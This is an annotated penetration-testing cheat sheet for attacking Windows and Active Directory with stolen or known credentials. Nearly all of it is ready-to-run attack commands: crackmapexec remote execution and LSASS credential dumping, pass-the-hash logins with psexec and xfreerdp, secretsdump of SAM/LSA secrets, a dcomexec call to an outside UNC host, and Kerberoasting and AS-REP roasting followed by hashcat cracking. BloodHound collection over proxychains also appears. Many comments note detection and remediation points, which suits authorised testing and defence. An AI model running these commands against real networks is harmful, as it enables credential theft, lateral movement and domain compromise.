With credentials


# Sample values used by every command in this section (a /24 range and a
# domain user). Note that USER is also the shell's own login-name variable;
# setting it here overrides it for this session, so prefer a different name
# if other tools in the same shell rely on $USER.
RHOSTS="192.168.1.0/24"
USER='user'
PASS='pass'
# Check the same credential against each protocol on every host in RHOSTS.
# -x whoami runs that command on each host that accepts the login; --shares
# lists SMB shares. From the host's side this is an authenticated logon plus
# remote process creation, which is what logon/process auditing will record.
crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares -x whoami
crackmapexec rdp $RHOSTS -u"$USER" -p"$PASS"
crackmapexec winrm $RHOSTS -u"$USER" -p"$PASS" -x whoami
crackmapexec wmi $RHOSTS -u"$USER" -p"$PASS" -x whoami
crackmapexec mssql $RHOSTS -u"$USER" -p"$PASS" -x whoami
crackmapexec ldap $RHOSTS -u"$USER" -p"$PASS"
# -M adcs: enumerate AD CS enrollment services over LDAP.
crackmapexec ldap $RHOSTS -u"$USER" -p"$PASS" -M adcs

# --local-auth treats USER as a local (SAM) account instead of a domain one.
crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares -x whoami --local-auth
# --put-file copies a local binary onto each host; a write into the Windows
# temp directory over an admin share is a simple thing to alert on.
crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares --put-file rustscan.exe /windows/temp/rustscan.exe
# -H authenticates with an NT hash instead of a password (the hash here is
# the sample value used throughout these notes, not a real credential).
crackmapexec smb $RHOSTS -u"$USER" --local-auth -H 3e1aef05e1b65e4f3cee0e60b0eba2de
# -M lsassy reads credentials out of LSASS on each host; LSASS access by an
# unexpected process is one of the strongest EDR signals, so expect this
# to be logged or blocked where credential guard / LSA protection is on.
crackmapexec smb $RHOSTS -u"Administrator" -p"$PASS" -M lsassy

# SMB/RPC enumeration with the same credential as above.
enum4linux $RHOSTS -u "$USER" -p "$PASS"
# Local directory exposed to the RDP session as the "share" drive
# (/drive:/tmp/share,share). Anything the remote host writes there lands on
# this machine, so keep it empty and separate from other data. Note: no -p,
# so mkdir fails if the directory already exists.
mkdir /tmp/share
# Hard-coded example domain/user/password here rather than $USER/$PASS.
# /cert:ignore disables TLS certificate validation of the RDP server, so
# the connection cannot detect a substituted endpoint.
xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:hackerbeepboop /p:Blabliblou_1 +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
# Same session using an NT hash (/pth:) instead of a password; hash is the
# sample value reused from the crackmapexec line above.
xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:user /pth:3e1aef05e1b65e4f3cee0e60b0eba2de +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share

# Impacket remote-execution examples. Target spec is [domain/]user[:pass]@host.
# psexec.py installs a temporary service on the target; service-creation
# events are the classic detection for it.
psexec.py 'domain.local'/'Administrator':'pass'@1.2.3.4
psexec.py 'Administrator':'pass'@1.2.3.4
# -hashes takes LMHASH:NTHASH; the empty LM part is normal. Hash is a sample.
psexec.py -hashes ":e7db1b821fac71d089d0b42d4a5bf605" Administrator@1.2.3.4 powershell.exe
smbexec.py 'Administrator':'pass'@1.2.3.4

# secretsdump.py pulls SAM/LSA secrets (and domain hashes when run against a
# DC); -history includes previous password hashes as well. Output contains
# credential material and should be handled and deleted accordingly.
secretsdump.py Administrator:'pass'@1.2.3.4 -history
secretsdump.py user@1.2.3.4 -hashes ':3e1aef05e1b65e4f3cee0e60b0eba2de' -history

# NOTE(review): in impacket -k is a boolean "use Kerberos" flag and the
# ccache is read from the KRB5CCNAME environment variable; as written,
# "user.ccache" is likely parsed as the target rather than a ticket file —
# confirm against the installed version.
wmiexec.py -k "user.ccache" 'powershell.exe "whoami /all"'
# Execution paths differ per tool (WMI, scheduled task, DCOM), which matters
# for which event source records them.
wmiexec.py 'user':'pass'@1.2.3.4 'powershell.exe "whoami /all"'
atexec.py 'user':'pass'@1.2.3.4 whoami
# Single quotes keep the backslashes literal; the target resolves the UNC
# path, so an inbound SMB connection from it is the only feedback (-nooutput).
dcomexec.py -object MMC20 'user':'pass'@1.2.3.4 '\\4.3.2.1\test' -nooutput # test for execution, listen on 445 first

Active Directory

LDAP enumeration
# Dump directory objects over LDAPS (636) into /tmp/ldeep; "all" selects every
# ldeep collector.
ldeep ldap -u user -p 'pass' -d do.main -s ldaps://1.2.3.4:636 all /tmp/ldeep
# Same idea via ldapdomaindump; 3269 is the Global Catalog over TLS, so this
# sees forest-wide partial attributes rather than one domain's full set.
ldapdomaindump ldaps://1.2.3.4:3269 -u 'do.main\user' -p 'pass'

Kerberoasting
# Request service tickets for every account with an SPN and write them in
# hashcat format. Any domain user can do this, which is why SPN accounts need
# long random passwords (or gMSA) rather than relying on detection.
GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /tmp/hashes.kerberoast
# -m 13100 is the Kerberos TGS-REP (etype 23) mode. NOTE: the wordlist path
# points at a .tar.gz archive; hashcat expects a plain-text wordlist, so the
# extracted rockyou.txt (as used further down) is what should be passed.
hashcat -m 13100 -a 0 /tmp/hashes.kerberoast /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-path=/home/user/HASHCATPOT

BloodHound

# Unpinned install of the collector from PyPI; pin a version (or install from
# a checked release) if the toolbox needs to be reproducible.
pip3 install --upgrade bloodhound
# Collect into a fresh temp dir so the JSON output doesn't mix with older runs.
cd $(mktemp -d)
# Collection is tunnelled through the proxychains config at /tmp/PIVOT;
# --dns-tcp and -ns direct DNS to the domain resolver so names resolve over
# the tunnel. -c All,LoggedOn adds session enumeration on top of the default
# set, which touches every reachable host and is correspondingly noisy.
proxychains -q -f /tmp/PIVOT bloodhound-python --dns-tcp -u'user' -p'pass' -ns '1.2.3.10' -d 'do.main' -c All,LoggedOn

# https://github.com/BloodHoundAD/BloodHound/releases
# --no-sandbox disables the Electron/Chromium sandbox; only use it where the
# GUI won't start otherwise, since it removes process isolation for the app.
./BloodHound --no-sandbox # Drag & drop files from last step
# Cypher queries for the BloodHound UI (raw query box). Each one is also an
# AD hygiene check: every result is something to remediate on the defensive side.
# Any unconstrained Delegation ? (BH query)
# Computers flagged unconstraineddelegation — remove the flag or mark privileged
# accounts "sensitive and cannot be delegated".
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

# Any constrained Delegation ? (BH query)
# Computer-to-computer AllowedToDelegate edges; review whether each is needed.
MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) return p

# Find all the edges that any user has against all the nodes (BH query).
# Shortest paths from every User, over the listed ACL/session edge types,
# to Computer nodes. "*1.." makes it multi-hop, so this can be large.
MATCH (n:User) MATCH p=allShortestPaths((n)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|AdminTo|CanRDP|ExecuteDCOM|ForceChangePassword*1..]->(m:Computer)) RETURN p

# kerberoast ? (BH query)
# User accounts with an SPN set; these need strong passwords or gMSA.
MATCH (n:User)WHERE n.hasspn=true RETURN n
# GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /tmp/hashes.kerberoast
# hashcat -m 13100 -a 0 /tmp/hashes.kerberoast rockyou.txt --potfile-path=HASHCATPOT

# preauth req ? (BH query)
# Accounts with "Do not require Kerberos preauthentication"; re-enable preauth.
MATCH (u:User {dontreqpreauth: true}) RETURN u
# GetNPUsers.py -debug 'do.main/' -usersfile /tmp/users -outputfile /tmp/hashes.aspreroast -format hashcat -dc-ip 1.2.3.10
# sudo hashcat -m 18200 /tmp/hashes.aspreroast rockyou.txt --potfile-path=HASHCATPOT

# Where users have sessions (from the LoggedOn collection), who can RDP where,
# and all GPO nodes.
MATCH p=()-[r:HasSession]->() RETURN p
MATCH p=()-[r:CanRDP]->() RETURN p
# (Keyword casing differs from the other queries; Cypher keywords are
# case-insensitive so it still runs.)
Match (n:GPO) return n

# Every outbound edge from users, then the GenericAll (full control) edges
# from users and from any principal; each GenericAll hit is an ACL to review.
MATCH p=(u:User)-[]->() RETURN p
MATCH p=(u:User)-[r:GenericAll]->() RETURN p
MATCH p=()-[r:GenericAll]->() RETURN p